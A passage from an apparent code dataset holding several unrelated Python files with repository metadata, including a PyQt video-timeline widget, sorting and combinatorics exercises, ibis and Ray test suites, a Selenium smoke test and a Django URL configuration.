\"60fps\"\r\n\r\n def __init__( self, parent=None ):\r\n super( QTimeline, self ).__init__( parent )\r\n self.setObjectName( \"QTimeline\" )\r\n\r\n # Playing Flag\r\n self._is_playing = False\r\n self.loop_play = False\r\n\r\n # timeline defaults\r\n self._lo = 0\r\n self._hi = 100\r\n self._frame = 0\r\n\r\n # frame period\r\n self._current_rate = self.DEFAULT_RATE\r\n self._period = int( self.RATE_DATA[ self.DEFAULT_RATE ][2] )\r\n\r\n # frame increment\r\n self._frameStep = 1\r\n\r\n # Master clock\r\n self._playTimer = QtCore.QTimer( self )\r\n self._playTimer.setTimerType( QtCore.Qt.PreciseTimer )\r\n self._playTimer.timeout.connect( self.doNextFrame )\r\n\r\n self._buildUI()\r\n self.setDuration( 100 )\r\n\r\n def _buildUI( self ):\r\n layout = QtWidgets.QGridLayout( self )\r\n layout.setContentsMargins( 1, 1, 1, 1 )\r\n layout.setHorizontalSpacing( 2 )\r\n layout.setVerticalSpacing( 2 )\r\n\r\n # Timebar\r\n x, y = 0, 0\r\n\r\n # Play Bar\r\n self.timeslider = QtWidgets.QSlider( self )\r\n #self.timeslider.setToolTip( \"\" )\r\n self.timeslider.setObjectName( \"TimeSlider\" )\r\n self.timeslider.setContentsMargins( 2, 2, 2, 2 )\r\n self.timeslider.setOrientation( QtCore.Qt.Horizontal )\r\n self.timeslider.setRange( self._lo, self._hi )\r\n self.timeslider.setValue( 0 )\r\n self.timeslider.setSizePolicy( QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum )\r\n layout.addWidget( self.timeslider, y, x, 1, 1, alignment=QtCore.Qt.AlignTop )\r\n y = 1\r\n\r\n # Spin Boxes\r\n sub_layout = QtWidgets.QGridLayout()\r\n\r\n self.startSB = QtWidgets.QSpinBox( self )\r\n self.startSB.setStatusTip( \"Start Frame\" )\r\n self.startSB.setButtonSymbols( QtWidgets.QAbstractSpinBox.NoButtons )\r\n self.startSB.setKeyboardTracking( False )\r\n sub_layout.addWidget( self.startSB, 0, 0, 1, 1, alignment=QtCore.Qt.AlignLeft )\r\n\r\n self.currentSB = QtWidgets.QSpinBox( self )\r\n self.currentSB.setStatusTip( \"Current Frame\" )\r\n self.currentSB.setButtonSymbols( QtWidgets.QAbstractSpinBox.NoButtons )\r\n self.currentSB.setKeyboardTracking( False )\r\n self.currentSB.setWrapping( True )\r\n sub_layout.addWidget( self.currentSB, 0, 1, 1, 1, alignment=QtCore.Qt.AlignCenter )\r\n\r\n self.finishSB = QtWidgets.QSpinBox( self )\r\n 
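# end-frame spinbox; like the other spin boxes it hides its arrow buttons\r\n        # (NoButtons) and only commits typed values once editing finishes\r\n        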
self.finishSB.setStatusTip( \"End Frame\" )\r\n self.finishSB.setButtonSymbols( QtWidgets.QAbstractSpinBox.NoButtons )\r\n self.finishSB.setKeyboardTracking( False )\r\n sub_layout.addWidget( self.finishSB, 0, 2, 1, 1, alignment=QtCore.Qt.AlignRight )\r\n layout.addLayout( sub_layout, y, x, 1, 1, alignment=QtCore.Qt.AlignTop )\r\n\r\n x += 1\r\n y = 0\r\n\r\n # Transport Controls\r\n # Two state \"Toggle button\"\r\n two_state = QtGui.QIcon()\r\n two_state.addPixmap( LnF.asPixMap(LnF.PLAY, 32), state=QtGui.QIcon.State.Off )\r\n two_state.addPixmap( LnF.asPixMap(LnF.STOP, 32), state=QtGui.QIcon.State.On )\r\n self.playBut = QtWidgets.QPushButton( two_state, \"\", parent=self )\r\n self.playBut.setCheckable( True )\r\n\r\n # The other buttons\r\n self.saveBut = QtWidgets.QPushButton( LnF.getIcon(LnF.SAVE), \"\", parent=self )\r\n self.ffwdBut = QtWidgets.QPushButton( LnF.getIcon(LnF.FFWD), \"\", parent=self )\r\n self.rewdBut = QtWidgets.QPushButton( LnF.getIcon(LnF.RRWD), \"\", parent=self )\r\n self.jgedBut = QtWidgets.QPushButton( LnF.getIcon(LnF.SKFW), \"\", parent=self )\r\n self.jgbgBut = QtWidgets.QPushButton( LnF.getIcon(LnF.SKBW), \"\", parent=self )\r\n\r\n upper_buts = [ self.jgbgBut, self.playBut, self.jgedBut ]\r\n lower_buts = [ self.rewdBut, self.saveBut, self.ffwdBut ]\r\n\r\n for i, but in enumerate( upper_buts ):\r\n layout.addWidget( but, y, x+i, 1, 1 )\r\n\r\n for i, but in enumerate( lower_buts ):\r\n layout.addWidget( but, y+1, x+i, 1, 1 ) \r\n\r\n x += len( upper_buts )\r\n\r\n # Framerate\r\n self.rateComboBox = QtWidgets.QComboBox( )\r\n self.rateComboBox.setStatusTip( \"Framerate\" )\r\n self.rateComboBox.addItems( list( self.RATE_DATA.keys() ) )\r\n self.rateComboBox.setCurrentIndex( self.rateComboBox.findText( self.DEFAULT_RATE ) )\r\n self.rateComboBox.setObjectName( \"RateComboBox\" )\r\n layout.addWidget( self.rateComboBox, y, x, 1, 1 )\r\n y += 1\r\n\r\n # Loop Play\r\n self.loop_play = QtWidgets.QCheckBox( \"Loop Play\", self )\r\n self.loop_play.setChecked( True )\r\n layout.addWidget( self.loop_play, y, x, 1, 1 )\r\n\r\n # UI setup\r\n self.setSizePolicy( QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum )\r\n\r\n # Signals\r\n self.playBut.clicked.connect( self.doToggle )\r\n #self.stopBut.clicked.connect( self.doStop )\r\n self.jgedBut.clicked.connect( self.doEnd )\r\n self.jgbgBut.clicked.connect( self.doBegin )\r\n self.ffwdBut.clicked.connect( self.doFwd )\r\n self.rewdBut.clicked.connect( self.doBwd )\r\n\r\n self.currentSB.valueChanged.connect( self.timeslider.setValue )\r\n\r\n self.rateComboBox.currentIndexChanged.connect( self._cbChangeRate )\r\n\r\n self.timeslider.sliderReleased.connect( self.frameSkipped.emit )\r\n self.timeslider.valueChanged.connect( self.currentSB.setValue )\r\n self.timeslider.valueChanged.connect( self.requestFrame )\r\n\r\n # Logic\r\n\r\n # external functions\r\n def setDuration( self, num_frames ):\r\n self._hi = num_frames\r\n self.startSB.setMinimum( self._lo )\r\n self.startSB.setMaximum( self._hi )\r\n self.startSB.setValue( self._lo )\r\n self.currentSB.setMinimum( self._lo )\r\n self.currentSB.setMaximum( self._hi )\r\n self.finishSB.setMinimum( self._lo + 1 )\r\n self.finishSB.setMaximum( self._hi )\r\n self.finishSB.setValue( self._hi )\r\n self.timeslider.setRange( self._lo, self._hi )\r\n\r\n # Call backs\r\n def _triggerFrame( self, frame ):\r\n self.requestFrame.emit( frame )\r\n self._frame = frame\r\n\r\n def _cbChangeRate( self, index ):\r\n self._current_rate = 
self.rateComboBox.itemText( index )\r\n self._period = int( self.RATE_DATA[ self._current_rate ][2] )\r\n\r\n if( self._is_playing ):\r\n self._playTimer.stop()\r\n self._playTimer.start( self._period )\r\n\r\n self.rateChanged.emit( self._period ) \r\n\r\n # Transport control buttons\r\n def doPlay( self ):\r\n self._is_playing = True\r\n self._playTimer.start( self._period )\r\n\r\n def doStop( self ):\r\n self._is_playing = False\r\n self._playTimer.stop()\r\n\r\n def doToggle( self ):\r\n if( self._is_playing ):\r\n self._playTimer.stop()\r\n\r\n else:\r\n self._playTimer.start( self._period )\r\n\r\n self._is_playing = not self._is_playing\r\n\r\n def doNextFrame( self, delta=1 ):\r\n frame = self.timeslider.value() + delta\r\n max_f = self.timeslider.maximum()\r\n\r\n if( frame >= max_f ):\r\n if( self.loop_play.isChecked() ):\r\n frame = self.timeslider.minimum()\r\n else:\r\n self.doStop()\r\n\r\n self.timeslider.setValue( frame )\r\n\r\n def doFwd( self ):\r\n frames = self.RATE_DATA[ self._current_rate ][0]\r\n self.doNextFrame( delta=frames )\r\n self.frameSkipped.emit()\r\n\r\n def doBwd( self ):\r\n frames = self.RATE_DATA[ self._current_rate ][0] * -1\r\n self.doNextFrame( delta=frames )\r\n self.frameSkipped.emit()\r\n \r\n def doBegin( self ):\r\n self.timeslider.setValue( self._lo )\r\n self.frameSkipped.emit()\r\n\r\n def doEnd( self ):\r\n self.timeslider.setValue( self._hi )\r\n self.frameSkipped.emit()\r\n\r\n\r\nPOS_CHANGE = QtWidgets.QGraphicsItem.ItemPositionChange\r\nPOS_HAS_CHANGED = QtWidgets.QGraphicsItem.ItemPositionHasChanged\r\n\r\nclass Communicate( QtCore.QObject ):\r\n moving = QtCore.Signal( QtCore.QPointF )\r\n\r\nclass PathHandle( QtWidgets.QGraphicsEllipseItem ):\r\n\r\n DEF_HIGHLIGHT = QtCore.Qt.yellow\r\n \r\n def __init__( self, path, index, colour=QtCore.Qt.green, rad=5, thick=1.3 ):\r\n super( PathHandle, self ).__init__( -rad, -rad, 2*rad, 2*rad )\r\n \r\n self.setAcceptHoverEvents( True )\r\n self.thickness = thick\r\n self.highlight = self.DEF_HIGHLIGHT\r\n self.colour = colour\r\n self.updateDrawing()\r\n self.path = path\r\n self.index = index\r\n self.movable = False\r\n self.touched = False\r\n \r\n self.coms = Communicate()\r\n\r\n self.setZValue( 1 ) # above the path\r\n\r\n self.setFlag( QtWidgets.QGraphicsItem.ItemIsMovable )\r\n self.setFlag( QtWidgets.QGraphicsItem.ItemSendsGeometryChanges )\r\n \r\n def setColour( self, colour ):\r\n self.colour = colour\r\n self.updateDrawing()\r\n \r\n def setHighlight( self, colour ):\r\n self.highlight = colour\r\n \r\n def updateDrawing( self, colour=None ):\r\n colour = colour or self.colour\r\n self.setPen( QtGui.QPen( colour, self.thickness, QtCore.Qt.SolidLine ) )\r\n \r\n # Overloads\r\n def itemChange( self, change, value ):\r\n if( change == POS_HAS_CHANGED and self.movable ):\r\n self.path.updateElement( self.index, value )\r\n if( self.touched ):\r\n # Human directed motion, emit event\r\n self.coms.moving.emit( value )\r\n\r\n return QtWidgets.QGraphicsEllipseItem.itemChange( self, change, value) \r\n\r\n def hoverEnterEvent( self, event ):\r\n self.updateDrawing( self.highlight )\r\n super( PathHandle, self ).hoverEnterEvent( event )\r\n\r\n def hoverLeaveEvent( self, event ):\r\n self.updateDrawing()\r\n super( PathHandle, self ).hoverLeaveEvent( event )\r\n\r\n def mousePressEvent( self, event ):\r\n if( event.button() == LMB ):\r\n self.touched = True\r\n self.path.hideLine( True )\r\n\r\n super( PathHandle, self).mousePressEvent( event )\r\n\r\n def mouseReleaseEvent( self, event 
):\r\n if( event.button() == LMB ):\r\n self.touched = False\r\n self.path.hideLine( False )\r\n\r\n super( PathHandle, self ).mouseReleaseEvent( event )\r\n\r\n\r\nclass OpenPath( QtWidgets.QGraphicsPathItem ):\r\n \r\n SZ = 1.75\r\n LINE_SOLID = QtCore.Qt.SolidLine\r\n LINE_DASH = QtCore.Qt.DashLine\r\n LINE_DOTS = QtCore.Qt.DotLine\r\n LINE_NONE = QtCore.Qt.NoPen\r\n \r\n def __init__( self, path, scene, colour=QtCore.Qt.black, receiver=None ):\r\n super( OpenPath, self ).__init__( path )\r\n self.colour = colour\r\n self.line_style = self.LINE_SOLID\r\n self.can_hide = False\r\n \r\n num_cvs = path.elementCount()\r\n self._handles = {}\r\n \r\n for i in range( num_cvs ):\r\n handle = PathHandle( self, i )\r\n handle.setPos( QtCore.QPointF( path.elementAt( i ) ) )\r\n scene.addItem( handle )\r\n self._handles[ i ] = handle\r\n if( receiver is not None ):\r\n handle.coms.moving.connect( receiver )\r\n\r\n for i in range( num_cvs ):\r\n self._handles[ i ].movable = True\r\n\r\n self.setPen( QtGui.QPen( self.colour, self.SZ, self.line_style ) )\r\n\r\n #self.setFlag( QtWidgets.QGraphicsItem.ItemIsSelectable, True )\r\n #self.setFlag( QtWidgets.QGraphicsItem.ItemIsMovable, True )\r\n self.setFlag( QtWidgets.QGraphicsItem.ItemSendsGeometryChanges, True )\r\n \r\n def hideLine( self, state ):\r\n if( not self.can_hide ):\r\n return\r\n\r\n if( state ):\r\n self.setStyle( OpenPath.LINE_NONE )\r\n else:\r\n self.setStyle( self.line_style )\r\n\r\n def setColour( self, colour ):\r\n self.colour = colour\r\n self.setPen( QtGui.QPen( self.colour, self.SZ, self.line_style ) )\r\n \r\n def setStyle( self, style ):\r\n self.setPen( QtGui.QPen( self.colour, self.SZ, style ) )\r\n \r\n def updateElement( self, index, pos ):\r\n path = self.path() \r\n path.setElementPositionAt( index, pos.x(), pos.y() )\r\n self.setPath( path )\r\n\r\n def reportCVs( self ):\r\n path = self.path()\r\n ret = \"\"\r\n for i in range( path.elementCount() ):\r\n el = path.elementAt( i )\r\n ret += \"({},{}) \".format( el.x, el.y )\r\n print( ret )\r\n\r\n def styleHandles( self, colour=None, thick=None ):\r\n for hand in self._handles.values():\r\n if( colour is not None ):\r\n hand.colour = colour\r\n \r\n if( thick is not None ):\r\n hand.thickness = thick\r\n\r\n hand.updateDrawing()\r\n\r\n def shape( self ):\r\n qp = QtGui.QPainterPathStroker()\r\n qp.setWidth( 10 )\r\n qp.setCapStyle( QtCore.Qt.SquareCap )\r\n shape = qp.createStroke( self.path() )\r\n return shape\r\n\r\n def itemChange( self, change, value ):\r\n if( change == POS_CHANGE and self.isSelected() ):\r\n # update Handles with new positions\r\n path = self.path()\r\n for i in range( path.elementCount() ):\r\n hand = self._handles[ i ]\r\n hand.movable = False\r\n hand.setPos( QtCore.QPointF( path.elementAt( i ) ) + value )\r\n hand.movable = True\r\n hand.update()\r\n\r\n return super( OpenPath, self ).itemChange( change, value )\r\n\r\n \r\nclass ClosedPath( OpenPath ):\r\n\r\n def __init__( self, path, scene, colour=QtCore.Qt.black, receiver=None ):\r\n num_cvs = path.elementCount()\r\n self._roots = { 0 : num_cvs-1, num_cvs-1 : 0 }\r\n super( ClosedPath, self ).__init__( path, scene, colour, receiver )\r\n \r\n def updateElement( self, index, pos ):\r\n \"\"\" Overload to move 1st and last handles at once \"\"\"\r\n path = self.path()\r\n if( index in self._roots ):\r\n # get the \"other\" node if this is the root\r\n other_idx = self._roots[ index ]\r\n other = self._handles[ other_idx ]\r\n # Update path\r\n path.setElementPositionAt( other_idx, 
pos.x(), pos.y() )\r\n            # Update Handle\r\n            other.movable = False\r\n            other.setPos( pos )\r\n            other.movable = True\r\n        \r\n        path.setElementPositionAt( index, pos.x(), pos.y() )\r\n        self.setPath( path )\r\n\r\n    def setFillAlpha( self, alpha=0 ):\r\n        col = QtGui.QColor( self.colour )\r\n        col.setAlpha( alpha )\r\n        self.setBrush( QtGui.QBrush( col ) )\r\n","repo_name":"bit-meddler/skunkWorks","sub_path":"pyVideoPlayers/vidGUI.py","file_name":"vidGUI.py","file_ext":"py","file_size_in_byte":17653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}\n{"seq_id":"5426199352","text":"# Python methods for computing permutations and combinations of a list\r\nfrom typing import List\r\n# Integer factorial\r\ndef factorial(n: int) -> int:\r\n    if n <= 0:\r\n        return 1\r\n    else:\r\n        return n * factorial(n - 1)\r\n\r\n# Number of full permutations\r\ndef permutationCount(n:int) -> int:\r\n    return factorial(n)\r\n\r\n# Number of combinations choosing m from n elements\r\ndef combinationCount(n:int, m:int) -> int:\r\n    return factorial(n) // (factorial(m) * factorial(n-m))\r\n\r\n# List of subsets\r\ndef subsets(nums: List[int]) -> List[List[int]]:\r\n    q = [[]]\r\n    n = len(nums)\r\n    for i in range(n):\r\n        for j in range(len(q)):\r\n            q.append(q[j] + [nums[i]])\r\n    return q\r\n\r\n# List of combinations choosing k of the n numbers\r\ndef combinations(nums: List[int], k: int) -> List[List[int]]:\r\n    q = [[]]\r\n    n = len(nums)\r\n    for i in range(n):\r\n        for j in range(len(q)):\r\n            q.append(q[j] + [nums[i]])\r\n    return [x for x in q if len(x) == k]\r\n\r\n# Full permutations\r\npermList = []\r\ndef allPermutations(list, stack):\r\n    # all elements of the list have been added, so record the result\r\n    if not list:\r\n        permList.append([x for x in stack])\r\n    else: # not yet at a leaf of the tree, so keep searching downward recursively\r\n        for i in range(len(list)):\r\n            stack.append(list[i])\r\n            del list[i]\r\n            allPermutations(list, stack)\r\n            list.insert(i, stack.pop())\r\n\r\n# Permutations by in-place swapping (selection)\r\npermList2 = []\r\ndef permutations(n, begin, end):\r\n    if begin >= end:\r\n        permList2.append(n)\r\n    else:\r\n        i = begin\r\n        for num in range(begin, end):\r\n            n[num], n[i] = n[i], n[num]\r\n            permutations(n, begin + 1, end)\r\n            n[num], n[i] = n[i], n[num]\r\n\r\nprint(subsets([1, 2, 3, 4]), end=\"\")\r\nprint(combinations([1, 2, 3, 4], 2), end=\"\")\r\nprint(factorial(10))\r\nprint(permutationCount(3))\r\nprint(combinationCount(5,3))\r\nallPermutations([1,2,3,4], [])\r\nprint(permList)","repo_name":"yangdanbo/AICodingBeginner","sub_path":"TianChiLeetCode/Python3/mathTools.py","file_name":"mathTools.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}\n{"seq_id":"30324344479","text":"'''\n    Programmers: Practice Robot (PCCP)\n    https://school.programmers.co.kr/tryouts/72140/challenges?language=python3\n'''\n\ndef solution(command):\n    path = [[0,1], [1,0], [0,-1], [-1,0]]\n    x = 0\n    y = 0\n    d = 0\n    \n    for i in command:\n        if i == 'R':\n            d = (d+1) % 4\n        elif i == 'L':\n            d = (d+3) % 4\n        elif i == 'G':\n            x += path[d][0]\n            y += path[d][1]\n        else:\n            x -= path[d][0]\n            y -= path[d][1]\n    \n    return [x, y]\n\ncommand = \"GRGLGRG\"\nprint(solution(command))\n# \t[2, 2]","repo_name":"kimkihyun1/TIL","sub_path":"CodingTest/2308/230811.py","file_name":"230811.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}\n{"seq_id":"35115688999","text":"def merge_sort(arr):\n    if len(arr) == 1:\n        return arr\n    else:\n        half = len(arr) // 2\n        return sorted_merge_arrays(\n            merge_sort(arr[:half]),\n            merge_sort(arr[half:])\n        )\n\n\ndef sorted_merge_arrays(arr1, arr2):\n    rez = []\n    i = 0\n    j = 0\n    while True:\n        if i == len(arr1):\n            return rez 
+ arr2[j:]\n if j == len(arr2):\n return rez + arr1[i:]\n if arr1[i] < arr2[j]:\n rez.append(arr1[i])\n i += 1\n else:\n rez.append(arr2[j])\n j += 1\n \n return rez\n\n\ndef main():\n # print(\n # sorted_merge_arrays(\n # [1, 3, 28, 99],\n # [4, 5, 6, 29]\n # )\n # )\n print(\n merge_sort([11, 18, 5, 4, 12, 15, 1, 13, 8, 16])\n )\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"adgh-dev/ubiquitous-octo-broccoli","sub_path":"merge-sort.py","file_name":"merge-sort.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5814266907","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, left, right, next):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\nclass Solution(object):\n def connect(self, root):\n \"\"\"\n :type root: Node\n :rtype: Node\n \"\"\"\n # if root and root.left and root.right:\n # root.left.next = root.right\n # if root.next:\n # root.right.next = root.next.left\n # self.connect(root.left)\n # self.connect(root.right)\n # return root\n \n # BFS\n if not root:\n return\n queue = [root]\n while queue:\n cur = queue.pop(0)\n if cur.left and cur.right:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n queue.append(cur.left)\n queue.append(cur.right)\n return root\n","repo_name":"shaniavina/Leetcode_Python","sub_path":"116_populating_next_right_pointers_in_each_node.py","file_name":"116_populating_next_right_pointers_in_each_node.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2184641747","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver import ChromeOptions\nhub = 'http://selenium-hub:4444'\nwebA = 'http://webA:3000'\ndriver = webdriver.Remote(command_executor=hub, options=ChromeOptions())\ndriver.set_page_load_timeout(5)\ninput(\"Press Enter to continue...\")\ndriver.get(webA)\nprint(driver.current_url)\ndriver.quit()","repo_name":"dbire/selenium_issue_11528","sub_path":"selenium_tests/test_webA.py","file_name":"test_webA.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24788843466","text":"from __future__ import annotations\n\nimport pytest\n\nimport ibis\nimport ibis.expr.operations as ops\nimport ibis.expr.types as ir\nfrom ibis import _\nfrom ibis.common.annotations import SignatureValidationError\nfrom ibis.tests.util import assert_equal\n\n\n@pytest.fixture\ndef sql_table():\n return ibis.table(\n [\n (\"v1\", \"decimal(12, 2)\"),\n (\"v2\", \"decimal(10, 4)\"),\n (\"v3\", \"int32\"),\n (\"v4\", \"int64\"),\n (\"v5\", \"float32\"),\n (\"v6\", \"double\"),\n (\"v7\", \"string\"),\n (\"v8\", \"boolean\"),\n ],\n \"testing\",\n )\n\n\n@pytest.fixture(params=(ibis.coalesce, ibis.greatest, ibis.least))\ndef function(request):\n return request.param\n\n\n@pytest.mark.parametrize(\n \"colname\",\n [\n \"tinyint_col\",\n \"smallint_col\",\n \"int_col\",\n \"bigint_col\",\n \"float_col\",\n \"double_col\",\n ],\n)\ndef test_abs(functional_alltypes, lineitem, colname):\n fname = \"abs\"\n op = ops.Abs\n\n expr = functional_alltypes[colname]\n _check_unary_op(expr, fname, op, type(expr))\n\n expr = lineitem.l_extendedprice\n _check_unary_op(expr, fname, op, type(expr))\n\n\ndef test_group_concat(functional_alltypes):\n col = 
functional_alltypes.string_col\n\n expr = col.group_concat()\n assert isinstance(expr.op(), ops.GroupConcat)\n op = expr.op()\n assert op.sep == ibis.literal(\",\").op()\n assert op.where is None\n\n expr = col.group_concat(\"|\")\n op = expr.op()\n assert op.sep == ibis.literal(\"|\").op()\n assert op.where is None\n\n\ndef test_zeroifnull(functional_alltypes):\n with pytest.warns(FutureWarning):\n dresult = functional_alltypes.double_col.zeroifnull()\n\n with pytest.warns(FutureWarning):\n iresult = functional_alltypes.int_col.zeroifnull()\n\n assert type(dresult.op()) == ops.Coalesce\n assert type(dresult) == ir.FloatingColumn\n\n # Impala upconverts all ints to bigint. Hmm.\n assert type(iresult) == type(iresult)\n\n\ndef test_fillna(functional_alltypes):\n result = functional_alltypes.double_col.fillna(5)\n assert isinstance(result, ir.FloatingColumn)\n\n assert isinstance(result.op(), ops.Coalesce)\n\n result = functional_alltypes.bool_col.fillna(True)\n assert isinstance(result, ir.BooleanColumn)\n\n # Highest precedence type\n result = functional_alltypes.int_col.fillna(functional_alltypes.bigint_col)\n assert isinstance(result, ir.IntegerColumn)\n\n\ndef test_ceil_floor(functional_alltypes, lineitem):\n cresult = functional_alltypes.double_col.ceil()\n fresult = functional_alltypes.double_col.floor()\n assert isinstance(cresult, ir.IntegerColumn)\n assert isinstance(fresult, ir.IntegerColumn)\n assert type(cresult.op()) == ops.Ceil\n assert type(fresult.op()) == ops.Floor\n\n cresult = ibis.literal(1.2345).ceil()\n fresult = ibis.literal(1.2345).floor()\n assert isinstance(cresult, ir.IntegerScalar)\n assert isinstance(fresult, ir.IntegerScalar)\n\n dec_col = lineitem.l_extendedprice\n cresult = dec_col.ceil()\n fresult = dec_col.floor()\n assert isinstance(cresult, ir.DecimalColumn)\n assert cresult.type() == dec_col.type()\n\n assert isinstance(fresult, ir.DecimalColumn)\n assert fresult.type() == dec_col.type()\n\n\ndef test_sign(functional_alltypes, lineitem):\n result = functional_alltypes.double_col.sign()\n assert isinstance(result, ir.FloatingColumn)\n assert type(result.op()) == ops.Sign\n\n result = ibis.literal(1.2345).sign()\n assert isinstance(result, ir.FloatingScalar)\n\n dec_col = lineitem.l_extendedprice\n result = dec_col.sign()\n assert isinstance(result, ir.DecimalColumn)\n\n\ndef test_round(functional_alltypes, lineitem):\n result = functional_alltypes.double_col.round()\n assert isinstance(result, ir.IntegerColumn)\n assert result.op().args[1] is None\n\n result = functional_alltypes.double_col.round(2)\n assert isinstance(result, ir.FloatingColumn)\n assert result.op().args[1] == ibis.literal(2).op()\n\n # Even integers are double (at least in Impala, check with other DB\n # implementations)\n result = functional_alltypes.int_col.round(2)\n assert isinstance(result, ir.FloatingColumn)\n\n dec = lineitem.l_extendedprice\n result = dec.round()\n assert isinstance(result, ir.DecimalColumn)\n\n result = dec.round(2)\n assert isinstance(result, ir.DecimalColumn)\n\n result = ibis.literal(1.2345).round()\n assert isinstance(result, ir.IntegerScalar)\n\n\ndef _check_unary_op(expr, fname, ex_op, ex_type):\n result = getattr(expr, fname)()\n assert type(result.op()) == ex_op\n assert type(result) == ex_type\n\n\ndef test_coalesce_instance_method(sql_table):\n v7 = sql_table.v7\n v5 = sql_table.v5.cast(\"string\")\n v8 = sql_table.v8.cast(\"string\")\n\n result = v7.coalesce(v5, v8, \"foo\")\n expected = ibis.coalesce(v7, v5, v8, \"foo\")\n assert_equal(result, 
expected)\n\n\ndef test_integer_promotions(sql_table, function):\n t = sql_table\n\n expr = function(t.v3, t.v4)\n assert isinstance(expr, ir.IntegerColumn)\n\n expr = function(5, t.v3)\n assert isinstance(expr, ir.IntegerColumn)\n\n expr = function(5, 12)\n assert isinstance(expr, ir.IntegerScalar)\n\n\ndef test_floats(sql_table, function):\n t = sql_table\n\n expr = function(t.v5)\n assert isinstance(expr, ir.FloatingColumn)\n\n expr = function(5.5, t.v5)\n assert isinstance(expr, ir.FloatingColumn)\n\n expr = function(5.5, 5)\n assert isinstance(expr, ir.FloatingScalar)\n\n\ndef test_deferred(sql_table, function):\n expr = function(None, _.v3, 2)\n res = expr.resolve(sql_table)\n sol = function(None, sql_table.v3, 2)\n assert res.equals(sol)\n\n\ndef test_no_arguments_errors(function):\n with pytest.raises(\n SignatureValidationError, match=\".+ has failed due to the following errors:\"\n ):\n function()\n","repo_name":"ibis-project/ibis","sub_path":"ibis/tests/expr/test_sql_builtins.py","file_name":"test_sql_builtins.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","stars":3246,"dataset":"github-code","pt":"52"} +{"seq_id":"43447003583","text":"def solution(s):\n answer = True\n dic = {'p': 0, 'y': 0}\n \n for i in s.lower():\n if i == 'p':\n dic['p'] += 1\n elif i == 'y':\n dic['y'] += 1\n \n if dic['p'] == dic['y']:\n return True\n else:\n return False\n\n","repo_name":"dd-jero/CodeProblem","sub_path":"프로그래머스/lv1/12916. 문자열 내 p와 y의 개수/문자열 내 p와 y의 개수.py","file_name":"문자열 내 p와 y의 개수.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33509627183","text":"from ray.util.client.ray_client_helpers import ray_start_client_server\nfrom unittest.mock import Mock\nimport pytest\n\n\ndef test_dataclient_disconnect_on_request():\n with ray_start_client_server() as ray:\n assert ray.is_connected()\n\n @ray.remote\n def f():\n return 42\n\n assert ray.get(f.remote()) == 42\n # Force grpc to error by sending garbage request\n with pytest.raises(ConnectionError):\n ray.worker.data_client._blocking_send(Mock())\n\n # Client should be disconnected\n assert not ray.is_connected()\n\n # Test that a new connection can be made\n connection_data = ray.connect(\"localhost:50051\")\n assert connection_data[\"num_clients\"] == 1\n assert ray.get(f.remote()) == 42\n\n\ndef test_dataclient_disconnect_before_request():\n with ray_start_client_server() as ray:\n assert ray.is_connected()\n\n @ray.remote\n def f():\n return 42\n\n assert ray.get(f.remote()) == 42\n # Force grpc to error by queueing garbage request. 
This simulates\n        # the data channel shutting down for connection issues between\n        # different remote calls.\n        ray.worker.data_client.request_queue.put(Mock())\n\n        # The next remote call should error since the data channel has shut\n        # down, which should also disconnect the client.\n        with pytest.raises(ConnectionError):\n            ray.get(f.remote())\n\n        # Client should be disconnected\n        assert not ray.is_connected()\n\n        # Test that a new connection can be made\n        connection_data = ray.connect(\"localhost:50051\")\n        assert connection_data[\"num_clients\"] == 1\n        assert ray.get(f.remote()) == 42\n\n\nif __name__ == \"__main__\":\n    import sys\n    sys.exit(pytest.main([\"-v\", __file__]))\n","repo_name":"yangysc/ResiNet","sub_path":"ray-master/python/ray/tests/test_dataclient_disconnect.py","file_name":"test_dataclient_disconnect.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"}\n{"seq_id":"11585180307","text":"\"\"\"projet_Uds URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom unicodedata import name\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.views import View\nfrom gamaistatisticsapp import views\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('etudiant/',views.home1,name=\"home1\"),\n    path('delete//',views.delete_data,name=\"deletedata\"),\n    path('',include('users.urls')),\n    \n    path('statistique/',views.statistique,name='statistique'),\n    path('statistique1/',views.statistique1,name='statistique1'),\n    path('stat3/',views.stat3,name='stat3'),\n    path('stat4/',views.stat4,name='stat4'),\n    path('stat5/',views.stat5,name='stat5'),\n    path('stat6/',views.stat6,name='stat6'),\n    path('stat7/',views.stat7,name='stat7'),\n    path('stat8/',views.stat8,name='stat8'),\n    path('moyenne/',views.moyenne1,name='moyenne'),\n    path('delete1//',views.delete_note,name=\"deletenote\"),\n    \n    